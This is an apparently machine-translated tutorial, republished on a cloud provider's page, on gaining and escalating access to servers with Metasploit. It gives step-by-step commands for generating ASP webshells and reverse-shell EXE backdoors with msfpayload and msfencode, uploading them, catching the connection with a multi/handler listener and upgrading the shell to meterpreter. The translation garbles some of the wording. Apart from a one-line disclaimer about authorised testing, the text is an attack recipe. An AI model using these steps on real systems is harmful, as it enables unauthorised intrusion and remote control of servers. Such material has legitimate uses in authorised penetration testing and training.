Metasploit-Privilege Escalation using webshell

Source: Internet
Author: User

The methods involved in this article can only be tested on authorized machines.
 
First, I suggest you check the usage of meterpreter on the Internet. Read this article to understand why msf is used for permission elevation (because msf has a meterpreter which is very powerful ^_^)
Metasploit has two tools: msfpayload and msfencode. These tools not only generate exe-type backdoors, but also generate webshells of the web script type. By generating webshells, you can set listeners to access the webshell url, if you are lucky, you can generate a session for further use.
The following describes the specific usage methods.
We can view the payload in msf through the command and remember its location: Use the following command to generate a webshell, which is similar to the usage of msfpayload in the front, however, a webpage script file is generated here:
Generate webshell
Msfpayload windows/meterpreter/reverse_tcp LHOST = your_ip | msfencode-t asp-o webshell. asp
Then upload the webshell to the server (this step requires the upload permission .)
Then start msfconsole
Enter use exploits/multi/handler,
Set PAYLOAD windows/meterpreter/reverse_tcp (here, payload is the same as msfpayload on the front.
Set LHOST your_ip,
Execute exploit, www.2cto.com
Then access the webshell url, here use curl to access the curl http://www.bkjia.com/webshell. asp. If exploit is successfully executed, you can see that meterpreter shell is returned in msfconsole. If meterpreter is not checked online, there are many.
However, when I use netbox to set up an asp environment, I always encounter execution errors. I hope that the reader can use it again after the actual verification is successful.
Here, asp webshell can also generate php webshell. jsp webshell needs to use the-t parameter to specify the Script Type in msfencode. I think php webshell is easier to succeed.
 
In addition, if the server has the permission to upload and execute the file to be uploaded, you can upload a backdoor generated by msfpayload, set the listener, execute the backdoor, return a session, and convert the session to meterpreter, in this way, you can easily use various features of meter. Here is a step: (the premise is above and explained)
1. msfpayload windows/shell_reverse_tcp LHOST = your_ip R | msfencode-t exe-o test.exe
2. Open msfconsole (another terminate Terminal)
3. set listening (Listening seems to be very advanced, don't be scared by it): use exploits/multi/handler, set LHOST = your_ip, execute exploit
4、upload test.exe to the server
If test.exe is executed on the server in the 5th region, a shell can be returned.
6. Convert windows shell to meterpreter shell: Because the payload used is shell_reverse_tcp, a shell is returned after the name is obtained. A windows shell (windows Command Prompt) is returned in the listener ), instead of a meterpreter shell, you need to convert it by pressing Ctrl + z to run windows shell in the background, and then executing the sessions command to check the shell session
Run sessions-u number (number indicates the windows shell session number you have found. In this way, a meterpreter shell is generated, and the powerful functions of meterpreter can be used. An error may also occur. Read the error information carefully and copy a part of the information to google.
Readers may have some questions: Since the exe file can be uploaded and executed, why is it more convenient to directly upload a powerful Trojan. I would like to say that msf has a powerful Meterpreter.
To sum up, you can give it a try. Some payloads in payloads cannot be used, and some unexpected discoveries may be made.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.